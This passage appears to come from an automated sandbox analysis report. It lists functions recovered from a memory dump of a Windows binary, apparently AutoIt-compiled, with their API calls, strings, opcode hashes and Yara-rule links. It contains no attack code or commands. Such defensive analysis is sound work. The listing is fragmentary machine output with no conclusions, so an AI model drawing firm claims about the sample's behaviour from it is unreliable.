                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003D9AC1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                                                                      • Opcode ID: dd1c0cb278deb1e5ad8d81295be704b6e5321d762f47df82f2cb611f2f5a3446
                                                                                                                                                                      • Instruction ID: 440cb467609c7f5e4b62589d5008f0c4cecb983d78a10da6d112d239c33cbeee
                                                                                                                                                                      • Opcode Fuzzy Hash: dd1c0cb278deb1e5ad8d81295be704b6e5321d762f47df82f2cb611f2f5a3446
                                                                                                                                                                      • Instruction Fuzzy Hash: AB41E9B2A00619BADF269AA0DC45FEFBBBDDF45710F01406BF904BB281D6759E04C7A1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B099E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID: DtC$DtC
                                                                                                                                                                      • API String ID: 1473721057-1586320119
                                                                                                                                                                      • Opcode ID: 251e60dbee4f7147959e6aae080c221fc14c5477b703ed32f4d4bf2eac029fe4
                                                                                                                                                                      • Instruction ID: e639dc7936864054332a20c223d5e873eec295c7786670577824ecd52ff493ca
                                                                                                                                                                      • Opcode Fuzzy Hash: 251e60dbee4f7147959e6aae080c221fc14c5477b703ed32f4d4bf2eac029fe4
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D5105B86087418FD765CF19C080A1ABBE1BB99354F65985DF9898B321D736EC81CF42
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E2882, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003E2892
                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003E28C8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                                                                      • String ID: |
                                                                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                                                                      • Opcode ID: a6d37b0d9db77121ab27232eed53d832061e607257a15e9c3e2e4a576935c708
                                                                                                                                                                      • Instruction ID: 800b8561e86cefef99d047ab747de69753f165480d84d4357dd4480414cc9a2e
                                                                                                                                                                      • Opcode Fuzzy Hash: a6d37b0d9db77121ab27232eed53d832061e607257a15e9c3e2e4a576935c708
                                                                                                                                                                      • Instruction Fuzzy Hash: 76313D71800119AFCF16EFA1CC85EEEBFB9FF08300F104129F819AA166DB355A56DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6CD2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 003F6D86
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003F6DC2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                      • Opcode ID: 99d8e089c32768f155c69b0cd0c3a6be441059d29db84803bba36ac5db270e74
                                                                                                                                                                      • Instruction ID: 3a72d5624078ec08f96043fad5993bbe48944ad0df2a617d42450b89aedbd4fc
                                                                                                                                                                      • Opcode Fuzzy Hash: 99d8e089c32768f155c69b0cd0c3a6be441059d29db84803bba36ac5db270e74
                                                                                                                                                                      • Instruction Fuzzy Hash: BC318F71200608AEDB129F38CC41AFB77B8FF48760F119629F99987190CB31AC51CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D2D91, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003D2E00
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003D2E3B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                      • Opcode ID: 0d9bce98ba83b910b8a36506cda8498b070c1a6ffdec0fdb2aab19680565f37c
                                                                                                                                                                      • Instruction ID: d11bf7cb8c0c88da68f4d1401d93929fe1724e5c6dbe8cb7289805247b8ca54a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d9bce98ba83b910b8a36506cda8498b070c1a6ffdec0fdb2aab19680565f37c
                                                                                                                                                                      • Instruction Fuzzy Hash: 7931F572600305EBEB268F59E885BAFBBB9EF15340F15442BED85973A1D7709940CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6943, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003F69D0
                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003F69DB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                      • Opcode ID: b1366eb159b45a1e70e8a4bb70a9f95ebf8805e16a4a3d317c2d2161daae2f3e
                                                                                                                                                                      • Instruction ID: 243f2856e8950efe7480f36570b06a66f79930c6e85d2d8c7561154850ef7bb6
                                                                                                                                                                      • Opcode Fuzzy Hash: b1366eb159b45a1e70e8a4bb70a9f95ebf8805e16a4a3d317c2d2161daae2f3e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7211C87170020D7FEF129F14CC91EBB376EEB893A4F124129FA589B290D7B59C5187A0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6E76, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00371D35: CreateWindowExW.USER32 ref: 00371D73
                                                                                                                                                                        • Part of subcall function 00371D35: GetStockObject.GDI32(00000011), ref: 00371D87
                                                                                                                                                                        • Part of subcall function 00371D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00371D91
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003F6EE0
                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 003F6EFA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                      • Opcode ID: f9f11ba208eee8f304040c3cc320d5fda8f6c52332feee35016acd20dbf70c01
                                                                                                                                                                      • Instruction ID: 15a89acd393703390d01a47770051cbd9469a2d6d1805d522db3652ffc5502af
                                                                                                                                                                      • Opcode Fuzzy Hash: f9f11ba208eee8f304040c3cc320d5fda8f6c52332feee35016acd20dbf70c01
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21597261020AAFDB05DFA8CD46AFA7BB8FB08314F014628FE55D3250D734E861DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6B8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 003F6C11
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003F6C20
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                      • String ID: edit
                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                      • Opcode ID: 2a24f40d0f3751f86c719d84737ae96483d0c3cb207ef93ba61b770ef47dbd3e
                                                                                                                                                                      • Instruction ID: 21aa03d375fc3f7e41d5155dda9fac58e404dda8535e251bd554d17ac44118fc
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a24f40d0f3751f86c719d84737ae96483d0c3cb207ef93ba61b770ef47dbd3e
                                                                                                                                                                      • Instruction Fuzzy Hash: 5111887150020CABEB128E64DC82ABA3B6DEF04368F214724FAA4D71E0C6359C909B60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D2E9E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003D2F11
                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003D2F30
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                      • Opcode ID: 1d1e30b023ce8895dc7ef28d11ae7f5ca2135bb07a308b0cd0bd4bb7ae823afa
                                                                                                                                                                      • Instruction ID: 84ecc6846ee8b4f21ffbf45922041ec42fa72a8cd96e5dd2932536caaa1d3218
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d1e30b023ce8895dc7ef28d11ae7f5ca2135bb07a308b0cd0bd4bb7ae823afa
                                                                                                                                                                      • Instruction Fuzzy Hash: 2711D333909114ABCB26EBA8EC44B9A73BDEB25310F1640B3EC44A73A0D770AD05C795
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E24CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003E2520
                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003E2549
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                      • Opcode ID: ee87f39e9354c3421fe1c690edfe2ec813ac071bf9589abdc75893989ae4c8db
                                                                                                                                                                      • Instruction ID: 55972ebccfccd20b4ce99a1bbb530b695feafd7a2ce604ed86c1a2d2a62ecf9d
                                                                                                                                                                      • Opcode Fuzzy Hash: ee87f39e9354c3421fe1c690edfe2ec813ac071bf9589abdc75893989ae4c8db
                                                                                                                                                                      • Instruction Fuzzy Hash: 6211E0701002B5BEDB269F538C98EBBFFACFF06351F10822AF905460C0D2706944DAE0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E80A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003E830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,003E80C8,?,00000000,?,?), ref: 003E8322
                                                                                                                                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003E80CB
                                                                                                                                                                      • htons.WSOCK32(00000000,?,00000000), ref: 003E8108
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                      • API String ID: 2496851823-2422070025
                                                                                                                                                                      • Opcode ID: 37fad28ae085e49b4471dc3786bc937225d90873e7e22ca9b198d748bb9c2144
                                                                                                                                                                      • Instruction ID: f6a2bdd1c688935f72e741c76205c05b95d36ddcd0a9c853eaa1f842ee6d25f5
                                                                                                                                                                      • Opcode Fuzzy Hash: 37fad28ae085e49b4471dc3786bc937225d90873e7e22ca9b198d748bb9c2144
                                                                                                                                                                      • Instruction Fuzzy Hash: 35110874A00255ABDB22AF65CC46FBDB334FF04350F10862BF915AB2D1DB71A815C755
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00380A8D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00373C26,004362F8,?,?,?), ref: 00380ACE
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003B50E1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                                      • String ID: cC
                                                                                                                                                                      • API String ID: 257928180-1161084114
                                                                                                                                                                      • Opcode ID: f850efa893b7a7f5b55539f92cc0d2d5b8a06fbd29b0d1a2afe0525fc5b13033
                                                                                                                                                                      • Instruction ID: c3280b9b72afa4e932fd5ce32c24e739a0989dd34a0675ea9efdb2a805d0750e
                                                                                                                                                                      • Opcode Fuzzy Hash: f850efa893b7a7f5b55539f92cc0d2d5b8a06fbd29b0d1a2afe0525fc5b13033
                                                                                                                                                                      • Instruction Fuzzy Hash: 22118635904309AACB57FB74CC01ED973B8EF08344F0180E6B94DDB251DA74DA888755
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C92E7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003CB0C4: GetClassNameW.USER32 ref: 003CB0E7
                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003C9355
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                                                                      • Opcode ID: f0b5d03b419a948e2a29873b9ba3d055b15e637fb979b355022ef156c659694a
                                                                                                                                                                      • Instruction ID: 6457e431c295aea6e5c74e1a9bcab6759a63fc3b5ed5a84d27e2a4a1c06e78c9
                                                                                                                                                                      • Opcode Fuzzy Hash: f0b5d03b419a948e2a29873b9ba3d055b15e637fb979b355022ef156c659694a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01D275A05224ABCB16EB60CC96EFE776DFF06320B11061AF8329B2D1DB355C08C750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D901B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                                                                      • String ID: EA06
                                                                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                                                                      • Opcode ID: 9264c4963cc4ac303d714a859f9861e74c27004f76b7046c3cc1c96a4aeca4c4
                                                                                                                                                                      • Instruction ID: ccb328cd95592588908562f49fe64d1b7fd3766e410911df7081c002deb7891a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9264c4963cc4ac303d714a859f9861e74c27004f76b7046c3cc1c96a4aeca4c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 7501F972904218AEDF29C6A8D816FEE7BFC9B01301F00419BF552D6281E5B5E614C760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C91DF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003CB0C4: GetClassNameW.USER32 ref: 003CB0E7
                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 003C924D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                                                                      • Opcode ID: 2a0a40c8d20e15c68c037ff37de9eaa13e572de37bfe5c0436c3563757cc7ac7
                                                                                                                                                                      • Instruction ID: ae180e3f91ab1731f811973f977b087be0a8fda8621abe32e3be8bdf0fe1f2dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a0a40c8d20e15c68c037ff37de9eaa13e572de37bfe5c0436c3563757cc7ac7
                                                                                                                                                                      • Instruction Fuzzy Hash: FB01D471B411087BCB1AEBA0C996FFF73ACDF05300F25042AB956AB281EB195E08C361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C9264, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003CB0C4: GetClassNameW.USER32 ref: 003CB0E7
                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 003C92D0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_memmove
